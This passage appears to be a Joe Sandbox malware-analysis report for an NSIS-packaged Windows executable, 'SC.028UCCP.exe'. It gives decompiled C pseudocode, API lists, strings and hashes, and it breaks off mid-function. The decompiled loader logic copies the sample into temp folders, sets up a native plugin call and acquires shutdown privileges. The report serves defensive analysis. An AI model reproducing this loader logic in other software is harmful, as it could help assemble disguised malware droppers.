                                  							__eflags = _t129 - 0x20;
                                  							if(_t129 == 0x20) {
                                  								L15:
                                  								_t13 = _t149 + 0x20;
                                  								 *_t13 =  *(_t149 + 0x20) | 0x00000004;
                                  								__eflags =  *_t13;
                                  								goto L16;
                                  							}
                                  							__eflags = _t129;
                                  							if(_t129 != 0) {
                                  								goto L16;
                                  							}
                                  							goto L15;
                                  						}
                                  						_t130 = _t48[1];
                                  						__eflags = _t130 - 0x20;
                                  						if(_t130 == 0x20) {
                                  							L11:
                                  							 *0x42ec40 = 1;
                                  							goto L12;
                                  						}
                                  						__eflags = _t130;
                                  						if(_t130 != 0) {
                                  							goto L12;
                                  						}
                                  						goto L11;
                                  					} else {
                                  						goto L4;
                                  					}
                                  					do {
                                  						L4:
                                  						_t48 =  &(_t48[1]);
                                  						__eflags =  *_t48 - 0x20;
                                  					} while ( *_t48 == 0x20);
                                  					goto L5;
                                  				}
                                  				_t137 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
                                  				GetTempPathA(0x400, _t137);
                                  				_t52 = E004030D7(_t151);
                                  				_t152 = _t52;
                                  				if(_t52 != 0) {
                                  					L25:
                                  					DeleteFileA("1033"); // executed
                                  					_t54 = E00402C33(_t154,  *(_t149 + 0x20)); // executed
                                  					 *((intOrPtr*)(_t149 + 0x10)) = _t54;
                                  					if(_t54 != 0) {
                                  						L35:
                                  						E00403569();
                                  						__imp__OleUninitialize();
                                  						if( *((intOrPtr*)(_t149 + 0x10)) == 0) {
                                  							__eflags =  *0x42ec34; // 0x0
                                  							if(__eflags != 0) {
                                  								_t147 = E00405EC3(3);
                                  								_t140 = E00405EC3(4);
                                  								_t59 = E00405EC3(5);
                                  								__eflags = _t147;
                                  								_t138 = _t59;
                                  								if(_t147 != 0) {
                                  									__eflags = _t140;
                                  									if(_t140 != 0) {
                                  										__eflags = _t138;
                                  										if(_t138 != 0) {
                                  											_t64 =  *_t147(GetCurrentProcess(), 0x28, _t149 + 0x1c);
                                  											__eflags = _t64;
                                  											if(_t64 != 0) {
                                  												 *_t140(0, "SeShutdownPrivilege", _t149 + 0x28);
                                  												 *(_t149 + 0x3c) = 1;
                                  												 *(_t149 + 0x48) = 2;
                                  												 *_t138( *((intOrPtr*)(_t149 + 0x30)), 0, _t149 + 0x2c, 0, 0, 0);
                                  											}
                                  										}
                                  									}
                                  								}
                                  								_t60 = ExitWindowsEx(2, 0);
                                  								__eflags = _t60;
                                  								if(_t60 == 0) {
                                  									E0040140B(9);
                                  								}
                                  							}
                                  							_t56 =  *0x42ec4c; // 0x2
                                  							__eflags = _t56 - 0xffffffff;
                                  							if(_t56 != 0xffffffff) {
                                  								 *(_t149 + 0x18) = _t56;
                                  							}
                                  							ExitProcess( *(_t149 + 0x18));
                                  						}
                                  						E004053C9( *((intOrPtr*)(_t149 + 0x14)), 0x200010);
                                  						ExitProcess(2);
                                  					}
                                  					_t156 =  *0x42ebbc; // 0x0
                                  					if(_t156 == 0) {
                                  						L34:
                                  						 *0x42ec4c =  *0x42ec4c | 0xffffffff;
                                  						 *(_t149 + 0x18) = E00403643();
                                  						goto L35;
                                  					}
                                  					_t143 = E00405670(_t146, 0);
                                  					if(_t143 < _t146) {
                                  						L31:
                                  						_t161 = _t143 - _t146;
                                  						 *((intOrPtr*)(_t149 + 0x10)) = "Error launching installer";
                                  						if(_t143 < _t146) {
                                  							lstrcatA(_t137, "~nsu.tmp");
                                  							if(lstrcmpiA(_t137, "C:\\Users\\hardz\\Desktop") == 0) {
                                  								goto L35;
                                  							}
                                  							CreateDirectoryA(_t137, 0);
                                  							SetCurrentDirectoryA(_t137);
                                  							_t166 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter"; // 0x43
                                  							if(_t166 == 0) {
                                  								E00405B98("C:\\Users\\hardz\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter", "C:\\Users\\hardz\\Desktop");
                                  							}
                                  							E00405B98("kernel32::EnumResourceTypesW(i 0,i r1,i 0)",  *(_t149 + 0x1c));
                                  							_t148 = 0x1a;
                                  							do {
                                  								_t78 =  *0x42ebb0; // 0x5aa248
                                  								E00405BBA(0, _t137, 0x428be0, 0x428be0,  *((intOrPtr*)(_t78 + 0x120)));
                                  								DeleteFileA(0x428be0);
                                  								if( *((intOrPtr*)(_t149 + 0x10)) != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\SC.028UCCP.exe", 0x428be0, 1) != 0) {
                                  									E00405A4C(0x428be0, 0);
                                  									_t84 =  *0x42ebb0; // 0x5aa248
                                  									E00405BBA(0, _t137, 0x428be0, 0x428be0,  *((intOrPtr*)(_t84 + 0x124)));
                                  									_t86 = E00405368(0x428be0);
                                  									if(_t86 != 0) {
                                  										CloseHandle(_t86);
                                  										 *((intOrPtr*)(_t149 + 0x10)) = 0;
                                  									}
                                  								}
                                  								"45088768" =  &("45088768"[1]);
                                  								_t148 = _t148 - 1;
                                  							} while (_t148 != 0);
                                  							E00405A4C(_t137, 0);
                                  							goto L35;
                                  						}
                                  						 *_t143 = 0;
                                  						_t144 = _t143 + 4;
                                  						if(E00405733(_t161, _t143 + 4) == 0) {
                                  							goto L35;
                                  						}
                                  						E00405B98("C:\\Users\\hardz\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter", _t144);
                                  						E00405B98("C:\\Users\\hardz\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter\\cavil\\Ablativers91", _t144);
                                  						 *((intOrPtr*)(_t149 + 0x10)) = 0;
                                  						goto L34;
                                  					}
                                  					_t100 = (( *0x409153 << 0x00000008 |  *0x409152) << 0x00000008 |  *0x409151) << 0x00000008 | " _?=";
                                  					while( *_t143 != _t100) {
                                  						_t143 = _t143 - 1;
                                  						if(_t143 >= _t146) {
                                  							continue;
                                  						}
                                  						goto L31;
                                  					}
                                  					goto L31;
                                  				}
                                  				GetWindowsDirectoryA(_t137, 0x3fb);
                                  				lstrcatA(_t137, "\\Temp");
                                  				_t103 = E004030D7(_t152);
                                  				_t153 = _t103;
                                  				if(_t103 != 0) {
                                  					goto L25;
                                  				}
                                  				GetTempPathA(0x3fc, _t137);
                                  				lstrcatA(_t137, "Low");
                                  				SetEnvironmentVariableA("TEMP", _t137);
                                  				SetEnvironmentVariableA("TMP", _t137);
                                  				_t108 = E004030D7(_t153);
                                  				_t154 = _t108;
                                  				if(_t108 == 0) {
                                  					goto L35;
                                  				}
                                  				goto L25;
                                  			}


                                  APIs
                                  • #17.COMCTL32 ref: 0040312C
                                  • SetErrorMode.KERNELBASE(00008001), ref: 00403137
                                  • OleInitialize.OLE32(00000000), ref: 0040313E
                                    • Part of subcall function 00405EC3: GetModuleHandleA.KERNEL32(?,?,?,00403150,00000008), ref: 00405ED5
                                    • Part of subcall function 00405EC3: LoadLibraryA.KERNELBASE(?,?,?,00403150,00000008), ref: 00405EE0
                                    • Part of subcall function 00405EC3: GetProcAddress.KERNEL32(00000000,?), ref: 00405EF1
                                  • SHGetFileInfoA.SHELL32(00428FE0,00000000,?,00000160,00000000,00000008), ref: 00403166
                                    • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,0040317B,Bilsynssteder Setup,NSIS Error), ref: 00405BA5
                                  • GetCommandLineA.KERNEL32(Bilsynssteder Setup,NSIS Error), ref: 0040317B
                                  • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\SC.028UCCP.exe",00000000), ref: 0040318E
                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\SC.028UCCP.exe",00000020), ref: 004031B9
                                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032B6
                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032C7
                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032D3
                                  • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032E7
                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004032EF
                                  • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403300
                                  • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403308
                                  • DeleteFileA.KERNELBASE(1033), ref: 0040331C
                                  • OleUninitialize.OLE32(?), ref: 004033CA
                                  • ExitProcess.KERNEL32 ref: 004033EA
                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\SC.028UCCP.exe",00000000,?), ref: 004033F6
                                  • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\SC.028UCCP.exe",00000000,?), ref: 00403402
                                  • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040340E
                                  • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403415
                                  • DeleteFileA.KERNEL32(00428BE0,00428BE0,?,kernel32::EnumResourceTypesW(i 0,i r1,i 0),?), ref: 0040346E
                                  • CopyFileA.KERNEL32(C:\Users\user\Desktop\SC.028UCCP.exe,00428BE0,00000001), ref: 00403482
                                  • CloseHandle.KERNEL32(00000000,00428BE0,00428BE0,?,00428BE0,00000000), ref: 004034AF
                                  • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403504
                                  • ExitWindowsEx.USER32 ref: 00403540
                                  • ExitProcess.KERNEL32 ref: 00403563
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                  • String ID: "$"C:\Users\user\Desktop\SC.028UCCP.exe"$1033$45088768$Bilsynssteder Setup$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter$C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91$C:\Users\user\Desktop$C:\Users\user\Desktop\SC.028UCCP.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$kernel32::EnumResourceTypesW(i 0,i r1,i 0)$~nsu.tmp
                                  • API String ID: 4107622049-4129128723
                                  • Opcode ID: 393541757f93537c9b418c913b57d133516a80a4bf131b4d3cef9bc631cffbd2
                                  • Instruction ID: f0167c368e647f3a77010dc3120ed20833c92e3e1e0627bdd261849a200f56ec
                                  • Opcode Fuzzy Hash: 393541757f93537c9b418c913b57d133516a80a4bf131b4d3cef9bc631cffbd2
                                  • Instruction Fuzzy Hash: ACB116306083816AE7216F719C8DA2B7EA8AB45706F44057FF581762E3C77C9A05CB6E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 97%
                                  			E00404822(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                  				struct HWND__* _v8;
                                  				struct HWND__* _v12;
                                  				signed int _v16;
                                  				signed int _v20;
                                  				intOrPtr _v24;
                                  				signed char* _v28;
                                  				long _v32;
                                  				signed int _v40;
                                  				int _v44;
                                  				signed int* _v56;
                                  				signed char* _v60;
                                  				signed int _v64;
                                  				long _v68;
                                  				void* _v72;
                                  				intOrPtr _v76;
                                  				intOrPtr _v80;
                                  				void* _v84;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t179;
                                  				intOrPtr _t180;
                                  				int _t187;
                                  				signed int _t192;
                                  				intOrPtr _t195;
                                  				intOrPtr _t197;
                                  				long _t201;
                                  				signed int _t205;
                                  				signed int _t216;
                                  				void* _t219;
                                  				void* _t220;
                                  				int _t226;
                                  				intOrPtr _t230;
                                  				signed int _t231;
                                  				signed int _t232;
                                  				signed int _t233;
                                  				signed int* _t235;
                                  				signed int _t239;
                                  				signed int _t241;
                                  				signed char _t242;
                                  				signed int _t244;
                                  				signed int _t247;
                                  				signed char _t248;
                                  				signed int _t249;
                                  				void* _t252;
                                  				void* _t254;
                                  				signed char* _t270;
                                  				signed char _t271;
                                  				long _t273;
                                  				long _t276;
                                  				int _t279;
                                  				int _t282;
                                  				signed int _t283;
                                  				long _t284;
                                  				signed int _t287;
                                  				int _t290;
                                  				signed int _t294;
                                  				intOrPtr _t301;
                                  				signed char* _t302;
                                  				struct HWND__* _t306;
                                  				int _t307;
                                  				signed int* _t308;
                                  				int _t309;
                                  				long _t310;
                                  				signed int _t311;
                                  				void* _t313;
                                  				long _t314;
                                  				int _t315;
                                  				signed int _t316;
                                  				void* _t318;
                                  				void* _t326;
                                  				void* _t329;
                                  
                                  				_t306 = _a4;
                                  				_v12 = GetDlgItem(_t306, 0x3f9);
                                  				_v8 = GetDlgItem(_t306, 0x408);
                                  				_t179 =  *0x42ebc8; // 0x5aa474
                                  				_t318 = SendMessageA;
                                  				_v20 = _t179;
                                  				_t180 =  *0x42ebb0; // 0x5aa248
                                  				_t282 = 0;
                                  				_v24 = _t180 + 0x94;
                                  				if(_a8 != 0x110) {
                                  					L23:
                                  					__eflags = _a8 - 0x405;
                                  					if(_a8 != 0x405) {
                                  						_t285 = _a16;
                                  					} else {
                                  						_a12 = _t282;
                                  						_t285 = 1;
                                  						_a8 = 0x40f;
                                  						_a16 = 1;
                                  					}
                                  					__eflags = _a8 - 0x4e;
                                  					if(_a8 == 0x4e) {
                                  						L28:
                                  						__eflags = _a8 - 0x413;
                                  						_v16 = _t285;
                                  						if(_a8 == 0x413) {
                                  							L30:
                                  							__eflags =  *0x42ebb9 & 0x00000002;
                                  							if(( *0x42ebb9 & 0x00000002) != 0) {
                                  								L41:
                                  								__eflags = _v16 - _t282;
                                  								if(_v16 != _t282) {
                                  									_t231 = _v16;
                                  									__eflags =  *((intOrPtr*)(_t231 + 8)) - 0xfffffe6e;
                                  									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe6e) {
                                  										SendMessageA(_v8, 0x419, _t282,  *(_t231 + 0x5c)); // executed
                                  									}
                                  									_t232 = _v16;
                                  									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6a;
                                  									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6a) {
                                  										__eflags =  *((intOrPtr*)(_t232 + 0xc)) - 2;
                                  										_t285 = _v20;
                                  										_t233 =  *(_t232 + 0x5c);
                                  										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
                                  											_t235 = _t233 * 0x418 + _t285 + 8;
                                  											 *_t235 =  *_t235 & 0xffffffdf;
                                  											__eflags =  *_t235;
                                  										} else {
                                  											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) | 0x00000020;
                                  										}
                                  									}
                                  								}
                                  								goto L48;
                                  							}
                                  							__eflags = _a8 - 0x413;
                                  							if(_a8 == 0x413) {
                                  								L33:
                                  								__eflags = _a8 - 0x413;
                                  								_t285 = 0 | _a8 != 0x00000413;
                                  								_t239 = E00404770(_v8, _a8 != 0x413);
                                  								_t311 = _t239;
                                  								__eflags = _t311 - _t282;
                                  								if(_t311 >= _t282) {
                                  									_t88 = _v20 + 8; // 0x8
                                  									_t285 = _t239 * 0x418 + _t88;
                                  									_t241 =  *_t285;
                                  									__eflags = _t241 & 0x00000010;
                                  									if((_t241 & 0x00000010) == 0) {
                                  										__eflags = _t241 & 0x00000040;
                                  										if((_t241 & 0x00000040) == 0) {
                                  											_t242 = _t241 ^ 0x00000001;
                                  											__eflags = _t242;
                                  										} else {
                                  											_t248 = _t241 ^ 0x00000080;
                                  											__eflags = _t248;
                                  											if(_t248 >= 0) {
                                  												_t242 = _t248 & 0x000000fe;
                                  											} else {
                                  												_t242 = _t248 | 0x00000001;
                                  											}
                                  										}
                                  										 *_t285 = _t242;
                                  										E0040117D(_t311);
                                  										_t244 =  *0x42ebb8; // 0x0
                                  										_t247 =  !_t244 >> 0x00000008 & 0x00000001;
                                  										__eflags = _t247;
                                  										_a12 = _t311 + 1;
                                  										_a16 = _t247;
                                  										_a8 = 0x40f;
                                  									}
                                  								}
                                  								goto L41;
                                  							}
                                  							_t285 = _a16;
                                  							__eflags =  *((intOrPtr*)(_t285 + 8)) - 0xfffffffe;
                                  							if( *((intOrPtr*)(_t285 + 8)) != 0xfffffffe) {
                                  								goto L41;
                                  							}
                                  							goto L33;
                                  						}
                                  						__eflags =  *((intOrPtr*)(_t285 + 4)) - 0x408;
                                  						if( *((intOrPtr*)(_t285 + 4)) != 0x408) {
                                  							goto L48;
                                  						}
                                  						goto L30;
                                  					} else {
                                  						__eflags = _a8 - 0x413;
                                  						if(_a8 != 0x413) {
                                  							L48:
                                  							__eflags = _a8 - 0x111;
                                  							if(_a8 != 0x111) {
                                  								L56:
                                  								__eflags = _a8 - 0x200;
                                  								if(_a8 == 0x200) {
                                  									SendMessageA(_v8, 0x200, _t282, _t282);
                                  								}
                                  								__eflags = _a8 - 0x40b;
                                  								if(_a8 == 0x40b) {
                                  									_t219 =  *0x42a004;
                                  									__eflags = _t219 - _t282;
                                  									if(_t219 != _t282) {
                                  										ImageList_Destroy(_t219);
                                  									}
                                  									_t220 =  *0x42a018;
                                  									__eflags = _t220 - _t282;
                                  									if(_t220 != _t282) {
                                  										GlobalFree(_t220);
                                  									}
                                  									 *0x42a004 = _t282;
                                  									 *0x42a018 = _t282;
                                  									 *0x42ec00 = _t282;
                                  								}
                                  								__eflags = _a8 - 0x40f;
                                  								if(_a8 != 0x40f) {
                                  									L88:
                                  									__eflags = _a8 - 0x420;
                                  									if(_a8 == 0x420) {
                                  										__eflags =  *0x42ebb9 & 0x00000001;
                                  										if(( *0x42ebb9 & 0x00000001) != 0) {
                                  											__eflags = _a16 - 0x20;
                                  											_t187 = (0 | _a16 == 0x00000020) << 3;
                                  											__eflags = _t187;
                                  											_t307 = _t187;
                                  											ShowWindow(_v8, _t307);
                                  											ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
                                  										}
                                  									}
                                  									goto L91;
                                  								} else {
                                  									E004011EF(_t285, _t282, _t282);
                                  									_t192 = _a12;
                                  									__eflags = _t192 - _t282;
                                  									if(_t192 != _t282) {
                                  										__eflags = _t192 - 0xffffffff;
                                  										if(_t192 != 0xffffffff) {
                                  											_t192 = _t192 - 1;
                                  											__eflags = _t192;
                                  										}
                                  										_push(_t192);
                                  										_push(8);
                                  										E004047F0();
                                  									}
                                  									__eflags = _a16 - _t282;
                                  									if(_a16 == _t282) {
                                  										L75:
                                  										E004011EF(_t285, _t282, _t282);
                                  										__eflags =  *0x42ebcc - _t282; // 0x1
                                  										_v32 =  *0x42a018;
                                  										_t195 =  *0x42ebc8; // 0x5aa474
                                  										_v60 = 0xf030;
                                  										_v20 = _t282;
                                  										if(__eflags <= 0) {
                                  											L86:
                                  											InvalidateRect(_v8, _t282, 1);
                                  											_t197 =  *0x42e37c; // 0x5ac8c7
                                  											__eflags =  *((intOrPtr*)(_t197 + 0x10)) - _t282;
                                  											if( *((intOrPtr*)(_t197 + 0x10)) != _t282) {
                                  												E0040468E(0x3ff, 0xfffffffb, E00404743(5));
                                  											}
                                  											goto L88;
                                  										} else {
                                  											_t138 = _t195 + 8; // 0x5aa47c
                                  											_t308 = _t138;
                                  											do {
                                  												_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
                                  												__eflags = _t201 - _t282;
                                  												if(_t201 != _t282) {
                                  													_t287 =  *_t308;
                                  													_v68 = _t201;
                                  													__eflags = _t287 & 0x00000001;
                                  													_v72 = 8;
                                  													if((_t287 & 0x00000001) != 0) {
                                  														_t147 =  &(_t308[4]); // 0x5aa48c
                                  														_v72 = 9;
                                  														_v56 = _t147;
                                  														_t150 =  &(_t308[0]);
                                  														 *_t150 = _t308[0] & 0x000000fe;
                                  														__eflags =  *_t150;
                                  													}
                                  													__eflags = _t287 & 0x00000040;
                                  													if((_t287 & 0x00000040) == 0) {
                                  														_t205 = (_t287 & 0x00000001) + 1;
                                  														__eflags = _t287 & 0x00000010;
                                  														if((_t287 & 0x00000010) != 0) {
                                  															_t205 = _t205 + 3;
                                  															__eflags = _t205;
                                  														}
                                  													} else {
                                  														_t205 = 3;
                                  													}
                                  													_t290 = (_t287 >> 0x00000005 & 0x00000001) + 1;
                                  													__eflags = _t290;
                                  													_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
                                  													SendMessageA(_v8, 0x1102, _t290, _v68);
                                  													SendMessageA(_v8, 0x110d, _t282,  &_v72);
                                  												}
                                  												_v20 = _v20 + 1;
                                  												_t308 =  &(_t308[0x106]);
                                  												__eflags = _v20 -  *0x42ebcc; // 0x1
                                  											} while (__eflags < 0);
                                  											goto L86;
                                  										}
                                  									} else {
                                  										_t309 = E004012E2( *0x42a018);
                                  										E00401299(_t309);
                                  										_t216 = 0;
                                  										_t285 = 0;
                                  										__eflags = _t309 - _t282;
                                  										if(_t309 <= _t282) {
                                  											L74:
                                  											SendMessageA(_v12, 0x14e, _t285, _t282);
                                  											_a16 = _t309;
                                  											_a8 = 0x420;
                                  											goto L75;
                                  										} else {
                                  											goto L71;
                                  										}
                                  										do {
                                  											L71:
                                  											_t301 = _v24;
                                  											__eflags =  *((intOrPtr*)(_t301 + _t216 * 4)) - _t282;
                                  											if( *((intOrPtr*)(_t301 + _t216 * 4)) != _t282) {
                                  												_t285 = _t285 + 1;
                                  												__eflags = _t285;
                                  											}
                                  											_t216 = _t216 + 1;
                                  											__eflags = _t216 - _t309;
                                  										} while (_t216 < _t309);
                                  										goto L74;
                                  									}
                                  								}
                                  							}
                                  							__eflags = _a12 - 0x3f9;
                                  							if(_a12 != 0x3f9) {
                                  								goto L91;
                                  							}
                                  							__eflags = _a12 >> 0x10 - 1;
                                  							if(_a12 >> 0x10 != 1) {
                                  								goto L91;
                                  							}
                                  							_t226 = SendMessageA(_v12, 0x147, _t282, _t282);
                                  							__eflags = _t226 - 0xffffffff;
                                  							if(_t226 == 0xffffffff) {
                                  								goto L91;
                                  							}
                                  							_t310 = SendMessageA(_v12, 0x150, _t226, _t282);
                                  							__eflags = _t310 - 0xffffffff;
                                  							if(_t310 == 0xffffffff) {
                                  								L54:
                                  								_t310 = 0x20;
                                  								L55:
                                  								E00401299(_t310);
                                  								SendMessageA(_a4, 0x420, _t282, _t310);
                                  								_t119 =  &_a12;
                                  								 *_t119 = _a12 | 0xffffffff;
                                  								__eflags =  *_t119;
                                  								_a16 = _t282;
                                  								_a8 = 0x40f;
                                  								goto L56;
                                  							}
                                  							_t230 = _v24;
                                  							__eflags =  *((intOrPtr*)(_t230 + _t310 * 4)) - _t282;
                                  							if( *((intOrPtr*)(_t230 + _t310 * 4)) != _t282) {
                                  								goto L55;
                                  							}
                                  							goto L54;
                                  						}
                                  						goto L28;
                                  					}
                                  				} else {
                                  					_t249 =  *0x42ebcc; // 0x1
                                  					_v32 = 0;
                                  					_v16 = 2;
                                  					 *0x42ec00 = _t306;
                                  					 *0x42a018 = GlobalAlloc(0x40, _t249 << 2);
                                  					_t252 = LoadBitmapA( *0x42eba0, 0x6e);
                                  					 *0x42a00c =  *0x42a00c | 0xffffffff;
                                  					_t313 = _t252;
                                  					 *0x42a014 = SetWindowLongA(_v8, 0xfffffffc, E00404E19);
                                  					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                  					 *0x42a004 = _t254;
                                  					ImageList_AddMasked(_t254, _t313, 0xff00ff);
                                  					SendMessageA(_v8, 0x1109, 2,  *0x42a004);
                                  					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                  						SendMessageA(_v8, 0x111b, 0x10, 0);
                                  					}
                                  					DeleteObject(_t313);
                                  					_t314 = 0;
                                  					do {
                                  						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
                                  						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
                                  							if(_t314 != 0x20) {
                                  								_v16 = _t282;
                                  							}
                                  							_t279 = SendMessageA(_v12, 0x143, _t282, E00405BBA(_t282, _t314, _t318, _t282, _t260)); // executed
                                  							SendMessageA(_v12, 0x151, _t279, _t314);
                                  						}
                                  						_t314 = _t314 + 1;
                                  					} while (_t314 < 0x21);
                                  					_t315 = _a16;
                                  					_t283 = _v16;
                                  					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
                                  					_push(0x15);
                                  					E00403EA8(_a4);
                                  					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
                                  					_push(0x16);
                                  					E00403EA8(_a4);
                                  					_t316 = 0;
                                  					_t284 = 0;
                                  					_t326 =  *0x42ebcc - _t316; // 0x1
                                  					if(_t326 <= 0) {
                                  						L19:
                                  						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                  						goto L20;
                                  					} else {
                                  						_t302 = _v20 + 8;
                                  						_v28 = _t302;
                                  						do {
                                  							_t270 =  &(_t302[0x10]);
                                  							if( *_t270 != 0) {
                                  								_v60 = _t270;
                                  								_t271 =  *_t302;
                                  								_t294 = 0x20;
                                  								_v84 = _t284;
                                  								_v80 = 0xffff0002;
                                  								_v76 = 0xd;
                                  								_v64 = _t294;
                                  								_v40 = _t316;
                                  								_v68 = _t271 & _t294;
                                  								if((_t271 & 0x00000002) == 0) {
                                  									__eflags = _t271 & 0x00000004;
                                  									if((_t271 & 0x00000004) == 0) {
                                  										_t273 = SendMessageA(_v8, 0x1100, 0,  &_v84); // executed
                                  										 *( *0x42a018 + _t316 * 4) = _t273;
                                  									} else {
                                  										_t284 = SendMessageA(_v8, 0x110a, 3, _t284);
                                  									}
                                  								} else {
                                  									_v76 = 0x4d;
                                  									_v44 = 1;
                                  									_t276 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                  									_v32 = 1;
                                  									 *( *0x42a018 + _t316 * 4) = _t276;
                                  									_t284 =  *( *0x42a018 + _t316 * 4);
                                  								}
                                  							}
                                  							_t316 = _t316 + 1;
                                  							_t302 =  &(_v28[0x418]);
                                  							_t329 = _t316 -  *0x42ebcc; // 0x1
                                  							_v28 = _t302;
                                  						} while (_t329 < 0);
                                  						if(_v32 != 0) {
                                  							L20:
                                  							if(_v16 != 0) {
                                  								E00403EDD(_v8);
                                  								_t282 = 0;
                                  								__eflags = 0;
                                  								goto L23;
                                  							} else {
                                  								ShowWindow(_v12, 5);
                                  								E00403EDD(_v12);
                                  								L91:
                                  								return E00403F0F(_a8, _a12, _a16);
                                  							}
                                  						}
                                  						goto L19;
                                  					}
                                  				}
                                  			}












































































                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                  • String ID: $M$N
                                  • API String ID: 1638840714-813528018
                                  • Opcode ID: 4d8d19e2ec862d8bfba0754ba844338e27a2af66167a0e8515c43c7f1b85903c
                                  • Instruction ID: 4cc0e2b80a329b10f62a048024603937819052accddc3c4311639f2bc02e2ced
                                  • Opcode Fuzzy Hash: 4d8d19e2ec862d8bfba0754ba844338e27a2af66167a0e8515c43c7f1b85903c
                                  • Instruction Fuzzy Hash: 2E0281B0A00209AFDB20DF55DD45AAE7BB5FB84315F10413AF610B62E1C7789E51DF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 74%
                                  			E00405BBA(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                  				signed int _v8;
                                  				struct _ITEMIDLIST* _v12;
